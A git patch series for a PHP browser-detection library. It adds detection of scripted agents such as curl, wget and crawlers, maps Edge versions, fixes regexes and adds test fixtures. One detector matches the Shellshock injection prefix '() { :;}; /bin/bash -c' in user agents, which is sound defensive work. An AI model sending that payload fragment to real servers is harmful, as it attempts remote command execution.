+ * + * @return bool + */ + public static function checkRobotNetcraft() + { + if (stripos(self::$userAgentString, "Netcraft SSL Server Survey") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::NETCRAFT); + self::$scriptedAgent->setType(ScriptedAgent::SURVEY); + self::$scriptedAgent->setInfoURL("https://www.netcraft.com/internet-data-mining/ssl-survey/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the curl library/cli tool. + * + * @return bool + */ + public static function checkRobotCurl() + { + if (stripos(self::$userAgentString, "curl/") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::CURL); + self::$scriptedAgent->setType(ScriptedAgent::GENERIC); + self::$scriptedAgent->setInfoURL("https://curl.haxx.se/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the python programming language. + * + * @return bool + */ + public static function checkRobotPython() + { + if (stripos(self::$userAgentString, "python-requests/") !== false || + stripos(self::$userAgentString, "python-urllib/") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::PYTHON); + self::$scriptedAgent->setType(ScriptedAgent::GENERIC); + self::$scriptedAgent->setInfoURL("https://www.python.org/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the GoLang programming language. + * + * @return bool + */ + public static function checkRobotGoLang() + { + if (stripos(self::$userAgentString, "Go-http-client") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::GOLANG); + self::$scriptedAgent->setType(ScriptedAgent::GENERIC); + self::$scriptedAgent->setInfoURL("https://golang.org/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the perl programming language. 
+ * + * @return bool + */ + public static function checkRobotPerl() + { + if (stripos(self::$userAgentString, "libwww-perl/") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::PERL); + self::$scriptedAgent->setType(ScriptedAgent::GENERIC); + self::$scriptedAgent->setInfoURL("https://www.perl.org/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the wget tool. + * + * @return bool + */ + public static function checkRobotWget() + { + if (stripos(self::$userAgentString, "Wget/") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::WGET); + self::$scriptedAgent->setType(ScriptedAgent::TOOL); + self::$scriptedAgent->setInfoURL("https://www.gnu.org/software/wget/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the zgrab TLS banner tool. + * + * @return bool + */ + public static function checkRobotZGrab() + { + if (stripos(self::$userAgentString, "zgrab/") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::ZGRAB); + self::$scriptedAgent->setType(ScriptedAgent::TOOL); + self::$scriptedAgent->setInfoURL("https://github.com/zmap/zgrab"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Java programming language. + * + * @return bool + */ + public static function checkRobotJava() + { + if (stripos(self::$userAgentString, "Java/") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::JAVA); + self::$scriptedAgent->setType(ScriptedAgent::GENERIC); + self::$scriptedAgent->setInfoURL("https://www.java.com/en/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the ShellShock exploit. 
+ * + * @return bool + */ + public static function checkRobotShellshock() + { + if (stripos(self::$userAgentString, "() { :;}; /bin/bash -c") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::SHELLSHOCK); + self::$scriptedAgent->setType(ScriptedAgent::EXPLOIT); + self::$scriptedAgent->setInfoURL("https://blog.cloudflare.com/inside-shellshock/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the browsershots testing tool. + * + * @return bool + */ + public static function checkRobotBrowershots() + { + if (stripos(self::$userAgentString, "Browsershots") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::BROWSERSHOTS); + self::$scriptedAgent->setType(ScriptedAgent::SURVEY); + self::$scriptedAgent->setInfoURL("http://browsershots.org/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the who.is spider. + * + * @return bool + */ + public static function checkRobotWhois() + { + if (stripos(self::$userAgentString, "who.is bot") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::WHOIS); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("http://www.who.is/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the MageReport exploit survey. + * + * @return bool + */ + public static function checkRobotMageReport() + { + if (stripos(self::$userAgentString, "MageReport") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::MAGEREPORT); + self::$scriptedAgent->setType(ScriptedAgent::SURVEY); + self::$scriptedAgent->setInfoURL("https://www.magereport.com/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the AdBeat advertising survey. 
+ * + * @return bool + */ + public static function checkRobotAdbeat() + { + if (stripos(self::$userAgentString, "adbeat.com") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::ADBEAT); + self::$scriptedAgent->setType(ScriptedAgent::ADVERTISING); + self::$scriptedAgent->setInfoURL("https://www.adbeat.com/operation_policy"); + return true; + } + return false; + } + + /** + * Determine if the agent is the SocialRankIO crawler. + * + * @return bool + */ + public static function checkRobotSocialrank() + { + if (stripos(self::$userAgentString, "SocialRankIOBot") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::SOCIALRANK); + self::$scriptedAgent->setType(ScriptedAgent::SURVEY); + self::$scriptedAgent->setInfoURL("http://socialrank.io/about"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Gluten Free crawler. + * + * @return bool + */ + public static function checkRobotGlutenFree() + { + if (stripos(self::$userAgentString, "Gluten Free Crawler/") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::GLUTENFREE); + self::$scriptedAgent->setType(ScriptedAgent::SURVEY); + self::$scriptedAgent->setInfoURL("http://glutenfreepleasure.com/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Proximic spider. + * + * @return bool + */ + public static function checkRobotProximic() + { + if (stripos(self::$userAgentString, "proximic;") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::PROXIMIC); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("http://www.proximic.com/info/spider.php"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Ubermetrics survey. 
+ * + * @return bool + */ + public static function checkRobotUbermetrics() + { + if (stripos(self::$userAgentString, "@ubermetrics-technologies.com") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::UBERMETRICS); + self::$scriptedAgent->setType(ScriptedAgent::SURVEY); + self::$scriptedAgent->setInfoURL("https://www.ubermetrics-technologies.com/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Verisign ips-agent. + * + * @return bool + */ + public static function checkRobotVerisign() + { + if (stripos(self::$userAgentString, "ips-agent") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::VERISIGN); + self::$scriptedAgent->setType(ScriptedAgent::SURVEY); + self::$scriptedAgent->setInfoURL("http://www.spambotsecurity.com/forum/viewtopic.php?f=7&t=1453"); + return true; + } + return false; + } +} \ No newline at end of file diff --git a/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml b/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml index d6628ec..0d91a2f 100644 --- a/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml +++ b/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml @@ -263,16 +263,5 @@ Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG SM-G360T1 Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.3 Chrome/38.0.2125.102 Mobile Safari/537.36 - - wkhtmltopdf - unknown - Linux - unknown - unknown - unknown - - Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) wkhtmltopdf-amd64 Safari/534.34 - - From 8d6b754548629dc83a2556442f6c74800878417d Mon Sep 17 00:00:00 2001 From: Tom Mettam Date: Sat, 1 Apr 2017 20:18:53 +0100 Subject: [PATCH 02/19] Fix typo in README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 92e5ef5..0050a5d 100644 --- a/README.md +++ b/README.md @@ -74,7 +74,7 @@ use Sinergi\BrowserDetector\Browser; $browser = new Browser(); -//You can also provide a userAgent string if you 
don't wish to detec the current browser +//You can also provide a userAgent string if you don't wish to detect the current browser //$browser = new Browser("Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0"); if ($browser->getName() === Browser::IE && $browser->getVersion() < 11) { From 09eba0c6e73608471237e27e96a0f700badad29b Mon Sep 17 00:00:00 2001 From: Tom Mettam Date: Sat, 1 Apr 2017 20:24:10 +0100 Subject: [PATCH 03/19] Correct regular expression in Firefox and Seamonkey: Instead of: Match everything except ^ ;\), Match: a-z, A-Z, 0-9, and . only. Remove dirty fudge added to remove the stray \n Now passes tests without said fudge --- src/Browser.php | 3 +-- src/BrowserDetector.php | 4 ++-- 2 files changed, 3 insertions(+), 4 deletions(-) diff --git a/src/Browser.php b/src/Browser.php index 52b0f44..8963492 100644 --- a/src/Browser.php +++ b/src/Browser.php @@ -154,8 +154,7 @@ public function isBrowser($name) */ public function setVersion($version) { - //The regex for the Firefox version lets through a linebreak, causing the test to fail - $this->version = str_replace("\n","",(string)$version); + $this->version = (string)$version; return $this; } diff --git a/src/BrowserDetector.php b/src/BrowserDetector.php index d18be6f..7fef018 100644 --- a/src/BrowserDetector.php +++ b/src/BrowserDetector.php @@ -772,7 +772,7 @@ public static function checkBrowserNokia() public static function checkBrowserFirefox() { if (stripos(self::$userAgentString, 'safari') === false) { - if (preg_match("/Firefox[\\/ \\(]([^ ;\\)]+)/i", self::$userAgentString, $matches)) { + if (preg_match("/Firefox[\\/ \\(]([a-zA-Z\\d\\.]*)/i", self::$userAgentString, $matches)) { if (isset($matches[1])) { self::$browser->setVersion($matches[1]); } @@ -798,7 +798,7 @@ public static function checkBrowserFirefox() public static function checkBrowserSeaMonkey() { if (stripos(self::$userAgentString, 'safari') === false) { - if (preg_match("/SeaMonkey[\\/ \\(]([^ ;\\)]+)/i", 
self::$userAgentString, $matches)) { + if (preg_match("/SeaMonkey[\\/ \\(]([a-zA-Z\\d\\.]*)/i", self::$userAgentString, $matches)) { if (isset($matches[1])) { self::$browser->setVersion($matches[1]); } From b19a9307b2264e808e6787e64d15e41931bc8d84 Mon Sep 17 00:00:00 2001 From: Gabriel Bull Date: Thu, 6 Apr 2017 09:41:46 -0400 Subject: [PATCH 04/19] Added empty change log for version 7.0.0 --- CHANGELOG.md | 4 ++++ CONTRIBUTING.md | 1 - LICENSE | 2 +- 3 files changed, 5 insertions(+), 2 deletions(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index bb0199d..314c589 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -1,5 +1,9 @@ # CHANGELOG +## 7.0.0 (released 2017-xx-xx) + +- ... + ## 6.1.2 (released 2016-12-28) - Added wkhtmltopdf detection diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index 0ca2ed1..c80e864 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -10,7 +10,6 @@ Contributions are welcome, and are accepted via pull requests. Please review the * Send a coherent commit history, making sure each individual commit in your pull request is meaningful. If you had to make multiple intermediate commits while developing, please [squash](http://git-scm.com/book/en/Git-Tools-Rewriting-History) them before submitting. * You may also need to [rebase](http://git-scm.com/book/en/Git-Branching-Rebasing) to avoid merge conflicts. - ## Running Tests You will need an install of [Composer](https://getcomposer.org) before continuing. 
diff --git a/LICENSE b/LICENSE index dfe9a79..4be9f19 100644 --- a/LICENSE +++ b/LICENSE @@ -1,6 +1,6 @@ The MIT License (MIT) -Copyright (c) 2013-2017 Chris Schuld +Copyright (c) 2013-present Chris Schuld Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in From da79d833d64290a3996958492b2e0fc6cf12b90c Mon Sep 17 00:00:00 2001 From: Gabriel Bull Date: Thu, 6 Apr 2017 09:46:51 -0400 Subject: [PATCH 05/19] Added boilerplate tests for srcipted agent --- .../Tests/ScriptedAgentDetectorTest.php | 13 +++++++++++++ tests/BrowserDetector/Tests/ScriptedAgentTest.php | 13 +++++++++++++ 2 files changed, 26 insertions(+) create mode 100644 tests/BrowserDetector/Tests/ScriptedAgentDetectorTest.php create mode 100644 tests/BrowserDetector/Tests/ScriptedAgentTest.php diff --git a/tests/BrowserDetector/Tests/ScriptedAgentDetectorTest.php b/tests/BrowserDetector/Tests/ScriptedAgentDetectorTest.php new file mode 100644 index 0000000..6f015ff --- /dev/null +++ b/tests/BrowserDetector/Tests/ScriptedAgentDetectorTest.php @@ -0,0 +1,13 @@ +assertNotFalse(false); + } +} diff --git a/tests/BrowserDetector/Tests/ScriptedAgentTest.php b/tests/BrowserDetector/Tests/ScriptedAgentTest.php new file mode 100644 index 0000000..63999b9 --- /dev/null +++ b/tests/BrowserDetector/Tests/ScriptedAgentTest.php @@ -0,0 +1,13 @@ +assertNotFalse(false); + } +} From a3874b53237ccc809d249d6b6ca8d37079a5975e Mon Sep 17 00:00:00 2001 From: Gabriel Bull Date: Thu, 6 Apr 2017 09:47:00 -0400 Subject: [PATCH 06/19] Fixed code style --- src/Browser.php | 3 --- src/ScriptedAgent.php | 8 -------- src/ScriptedAgentDetector.php | 2 +- 3 files changed, 1 insertion(+), 12 deletions(-) diff --git a/src/Browser.php b/src/Browser.php index 8963492..3340f4c 100644 --- a/src/Browser.php +++ b/src/Browser.php @@ -2,9 +2,6 @@ namespace Sinergi\BrowserDetector; -/** - * Browser Detection. 
- */ class Browser { const UNKNOWN = 'unknown'; diff --git a/src/ScriptedAgent.php b/src/ScriptedAgent.php index 826a146..90aef4d 100644 --- a/src/ScriptedAgent.php +++ b/src/ScriptedAgent.php @@ -2,9 +2,6 @@ namespace Sinergi\BrowserDetector; -/** - * Browser Detection. - */ class ScriptedAgent { const UNKNOWN = 'unknown'; @@ -185,9 +182,4 @@ public function getUserAgent() { return $this->userAgent; } - - } - - -?> \ No newline at end of file diff --git a/src/ScriptedAgentDetector.php b/src/ScriptedAgentDetector.php index c51cf84..2cd6d84 100644 --- a/src/ScriptedAgentDetector.php +++ b/src/ScriptedAgentDetector.php @@ -797,4 +797,4 @@ public static function checkRobotVerisign() } return false; } -} \ No newline at end of file +} From 235a2a859e77d97c68e67a41e3abff6a5a48b71f Mon Sep 17 00:00:00 2001 From: Tom Mettam Date: Thu, 6 Apr 2017 15:06:48 +0100 Subject: [PATCH 07/19] Issue #77 - Detection from Microsoft Edge Version returns the HTML Version This adds a lookup table for Edge. This will require some maintenance. If the version cannot be resolved, the browser name "EdgeHTML" is returned rather than "Edge", so that the version number is not misleading. Also fixed regex for edge. 
--- src/Browser.php | 1 + src/BrowserDetector.php | 89 +++++++++++++++++-- .../Tests/_files/UserAgentStrings.xml | 4 +- 3 files changed, 87 insertions(+), 7 deletions(-) diff --git a/src/Browser.php b/src/Browser.php index 3340f4c..e2e2e4c 100644 --- a/src/Browser.php +++ b/src/Browser.php @@ -38,6 +38,7 @@ class Browser const GSA = 'Google Search Appliance'; const YANDEX = 'Yandex'; const EDGE = 'Edge'; + const EDGE_HTML = 'EdgeHTML'; const DRAGON = 'Dragon'; const NSPLAYER = 'Windows Media Player'; const UCBROWSER = 'UC Browser'; diff --git a/src/BrowserDetector.php b/src/BrowserDetector.php index 7fef018..fb54500 100644 --- a/src/BrowserDetector.php +++ b/src/BrowserDetector.php @@ -71,6 +71,72 @@ class BrowserDetector implements DetectorInterface 'Mozilla', /* Mozilla is such an open standard that you must check it last */ ); + //https://en.wikipedia.org/wiki/Microsoft_Edge + protected static $edgeHTML = [ + "12.10049" => "0.10.10049", + "12.10051" => "0.11.10051", + "12.10052" => "0.11.10052", + "12.10061" => "0.11.10061", + "12.10074" => "0.11.10074", + "12.1008" => "0.11.10080", + "12.10122" => "13.10122", + "12.1013" => "15.1013", + "12.10136" => "16.10136", + "12.10149" => "19.10149", + "12.10158" => "20.10158", + "12.10159" => "20.10159", + "12.10162" => "20.10162", + "12.10166" => "20.10166", + "12.1024" => "20.1024", + "12.10512" => "20.10512", + "12.10514" => "20.10514", + "12.10525" => "20.10525", + "12.10532" => "20.10532", + "12.10536" => "20.10536", + "13.10547" => "21.10547", + "13.10549" => "21.10549", + "13.10565" => "23.10565", + "13.10572" => "25.10572", + "13.10576" => "25.10576", + "13.10581" => "25.10581", + "13.10586" => "25.10586", + "13.11082" => "25.11082", + "13.11099" => "27.11099", + "13.11102" => "28.11102", + "13.14251" => "28.14251", + "13.14257" => "28.14257", + "14.14267" => "31.14267", + "14.14271" => "31.14271", + "14.14279" => "31.14279", + "14.14283" => "31.14283", + "14.14291" => "34.14291", + "14.14295" => "34.14295", + 
"14.143" => "34.143", + "14.14316" => "37.14316", + "14.14322" => "37.14322", + "14.14327" => "37.14327", + "14.14328" => "37.14328", + "14.14332" => "37.14332", + "14.14342" => "38.14342", + "14.14352" => "38.14352", + "14.14393" => "38.14393", + "14.14901" => "39.14901", + "14.14905" => "39.14905", + "14.14915" => "39.14915", + "14.14926" => "39.14926", + "14.14931" => "39.14931", + "14.14936" => "39.14936", + "15.14942" => "39.14942", + "15.14946" => "39.14946", + "15.14951" => "39.14951", + "15.14955" => "39.14955", + "15.14959" => "39.14959", + "15.14965" => "39.14965", + "15.14971" => "39.14971", + "15.14977" => "39.14977", + "15.14986" => "39.14986" + ]; + /** * Routine to determine the browser type. * @@ -473,11 +539,24 @@ public static function checkBrowserVivaldi() public static function checkBrowserEdge() { if (stripos(self::$userAgentString, 'Edge') !== false) { - $version = explode('Edge/', self::$userAgentString); - if (isset($version[1])) { - self::$browser->setVersion((float)$version[1]); + preg_match('/Edge[\\/ \\(]([a-zA-Z\\d\\.]*)/i', self::$userAgentString, $matches); + if (sizeof($matches)>1) + { + if (isset(self::$edgeHTML[$matches[1]])) + { + self::$browser->setName(Browser::EDGE); + self::$browser->setVersion(self::$edgeHTML[$matches[1]]); + } + else + { + self::$browser->setName(Browser::EDGE_HTML); + self::$browser->setVersion($matches[1]); + } + } + else + { + self::$browser->setName(Browser::EDGE); } - self::$browser->setName(Browser::EDGE); return true; } @@ -962,7 +1041,7 @@ public static function checkBrowserYandex() return false; } - + /** * Determine if the browser is Comodo Dragon / Ice Dragon / Chromodo. 
* diff --git a/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml b/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml index 0d91a2f..89dca75 100644 --- a/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml +++ b/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml @@ -110,7 +110,7 @@ Edge - 12.10136 + 16.10136 Windows 10.0 unknown @@ -232,7 +232,7 @@ Edge - 14.14393 + 38.14393 Windows Phone 10 Lumia 640 LTE From 0f7bff3605eb2f6c602c8990050afea9d9397d31 Mon Sep 17 00:00:00 2001 From: Tom Mettam Date: Thu, 6 Apr 2017 15:09:36 +0100 Subject: [PATCH 08/19] Add unit test for EdgeHTML (Un-matched EdgeHTML version string) --- .../BrowserDetector/Tests/_files/UserAgentStrings.xml | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml b/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml index 89dca75..99d8945 100644 --- a/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml +++ b/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml @@ -241,6 +241,17 @@ Mozilla/5.0 (Windows Phone 10.0; Android 6.0.1; Microsoft; Lumia 640 LTE) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Mobile Safari/537.36 Edge/14.14393 + + EdgeHTML + 12.00049 + Windows Phone + 10 + Lumia 640 LTE + unknown + + Mozilla/5.0 (Windows Phone 10.0; Android 6.0.1; Microsoft; Lumia 640 LTE) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Mobile Safari/537.36 Edge/12.00049 + + BlackBerry 7.1.0.523 From a88c162f85f746f859d34d136430a6572ecdb539 Mon Sep 17 00:00:00 2001 From: Tom Mettam Date: Thu, 6 Apr 2017 19:52:54 +0100 Subject: [PATCH 09/19] Add tests for the scripted agent detection --- .../Tests/ScriptedAgentDetectorTest.php | 10 +- .../Tests/ScriptedAgentTest.php | 6 +- .../Tests/_files/UserAgentStrings.xml | 737 +++++++++++++++++- .../Tests/_includes/UserAgentString.php | 46 ++ .../Tests/_includes/UserAgentStringMapper.php | 43 +- 5 files changed, 829 insertions(+), 13 deletions(-) diff --git 
a/tests/BrowserDetector/Tests/ScriptedAgentDetectorTest.php b/tests/BrowserDetector/Tests/ScriptedAgentDetectorTest.php index 6f015ff..91a5d08 100644 --- a/tests/BrowserDetector/Tests/ScriptedAgentDetectorTest.php +++ b/tests/BrowserDetector/Tests/ScriptedAgentDetectorTest.php @@ -3,11 +3,17 @@ namespace Sinergi\BrowserDetector\Tests; use PHPUnit_Framework_TestCase; +use Sinergi\BrowserDetector\ScriptedAgent; class ScriptedAgentDetectorTest extends PHPUnit_Framework_TestCase { - public function testExample() + public function testDetect() { - $this->assertNotFalse(false); + $userAgentStringCollection = UserAgentStringMapper::map(); + foreach ($userAgentStringCollection as $userAgentString) { + $agent = new ScriptedAgent($userAgentString->getString()); + $this->assertSame($userAgentString->getScriptedAgent(), $agent->getName()); + $this->assertSame($userAgentString->getScriptedAgentType(), $agent->getType()); + } } } diff --git a/tests/BrowserDetector/Tests/ScriptedAgentTest.php b/tests/BrowserDetector/Tests/ScriptedAgentTest.php index 63999b9..fb03756 100644 --- a/tests/BrowserDetector/Tests/ScriptedAgentTest.php +++ b/tests/BrowserDetector/Tests/ScriptedAgentTest.php @@ -3,11 +3,13 @@ namespace Sinergi\BrowserDetector\Tests; use PHPUnit_Framework_TestCase; +use Sinergi\BrowserDetector\ScriptedAgent; class ScriptedAgentTest extends PHPUnit_Framework_TestCase { - public function testExample() + public function testDetect() { - $this->assertNotFalse(false); + $agent = new ScriptedAgent(); + $this->assertSame(ScriptedAgent::UNKNOWN, $agent->getName()); } } diff --git a/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml b/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml index 0d91a2f..a9b74c7 100644 --- a/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml +++ b/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml @@ -3,11 +3,13 @@ Opera - 21.0.1432.67 + 21.0.1432.67 OS X 10.9.3 unknown unknown + unknown + unknown Mozilla/5.0 (Macintosh; Intel Mac OS 
X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.132 Safari/537.36 OPR/21.0.1432.67 @@ -20,6 +22,8 @@ 3.2 iPad unknown + unknown + unknown Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10gin_lib.cc @@ -32,6 +36,8 @@ 8.1.2 iPhone unknown + unknown + unknown Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 @@ -44,6 +50,8 @@ 10.10.2 unknown unknown + unknown + unknown Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36 @@ -56,6 +64,8 @@ 10.10.2 unknown unknown + unknown + unknown Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 YaBrowser/15.6.2311.3451 (beta) Yowser/2.0 Safari/537.36 @@ -68,6 +78,8 @@ 7 unknown unknown + unknown + unknown Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) @@ -80,6 +92,8 @@ 10.10 unknown unknown + unknown + unknown Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:35.0) Gecko/20100101 Firefox/35.0 @@ -91,6 +105,8 @@ 8.1.2 iPhone unknown + unknown + unknown Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) OPiOS/10.1.1.92212 Mobile/12B440 Safari/9537.53 @@ -103,6 +119,8 @@ 8.1.2 iPhone unknown + unknown + unknown Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/12B440 Safari/600.1.4 @@ -115,6 +133,8 @@ 10.0 unknown unknown + unknown + unknown Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10136 @@ -127,6 +147,8 @@ 10.0 unknown unknown + unknown + unknown Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 
Firefox/40.0 @@ -138,6 +160,8 @@ 7 unknown unknown + unknown + unknown Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.89 Vivaldi/1.0.83.38 Safari/537.36 @@ -149,6 +173,8 @@ 47.0.2526.80 unknown unknown + unknown + unknown Mozilla/5.0 (X11; CrOS x86_64 7520.62.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36 @@ -160,6 +186,8 @@ 7 unknown unknown + unknown + unknown Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) @@ -171,6 +199,8 @@ 7 unknown unknown + unknown + unknown Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) @@ -182,6 +212,8 @@ 7 unknown unknown + unknown + unknown Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) @@ -193,6 +225,8 @@ 7 unknown unknown + unknown + unknown Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) @@ -204,6 +238,8 @@ 8 unknown unknown + unknown + unknown Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7 @@ -215,6 +251,8 @@ unknown unknown unknown + unknown + unknown Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5 @@ -226,6 +264,8 @@ 10.0.9.2372 unknown unknown + unknown + unknown Mozilla/5.0 (BB10; Touch) AppleWebKit/537.10+ (KHTML, like Gecko) Version/10.0.9.2372 Mobile Safari/537.10+ @@ -237,6 +277,8 @@ 10 Lumia 640 LTE unknown + unknown + unknown Mozilla/5.0 (Windows Phone 10.0; Android 6.0.1; Microsoft; Lumia 640 LTE) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 
Mobile Safari/537.36 Edge/14.14393 @@ -248,6 +290,8 @@ 7.1.0.523 unknown unknown + unknown + unknown Mozilla/5.0 (BlackBerry; U; BlackBerry 9380; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.523 Mobile Safari/534.11+ @@ -259,9 +303,700 @@ 5.1.1 Samsung SM-G360T1 unknown + unknown + unknown Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG SM-G360T1 Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.3 Chrome/38.0.2125.102 Mobile Safari/537.36 + + Safari + unknown + Linux + unknown + unknown + unknown + wkhtmltopdf + Tool + + Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) wkhtmltopdf-amd64 Safari/534.34 + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Baidu + Spider + + Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) + + + + unknown + unknown + unknown + unknown + unknown + unknown + Baidu + Spider + + Baiduspider+(+http://www.baidu.com/search/spider_jp.html) + + + + unknown + unknown + unknown + unknown + unknown + unknown + Baidu + Spider + + BaiDuSpider + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Google + Spider + + Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) + + + + unknown + unknown + unknown + unknown + unknown + unknown + Google + Spider + + Googlebot/2.1 (+http://www.google.com/bot.html) + + + + Chrome + 41.0.2272.96 + Android + 6.0.1 + unknown + unknown + Google + Spider + + ​Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) + + + + unknown + unknown + unknown + unknown + unknown + unknown + Google + Spider + + Googlebot-News + + + + unknown + unknown + unknown + unknown + unknown + unknown + Google + Spider + + Googlebot-Image/1.0 + + + + unknown + unknown + unknown + unknown + unknown + unknown + Google + Spider + + Googlebot-Video/1.0 + + + + Mozilla + 5.0 + 
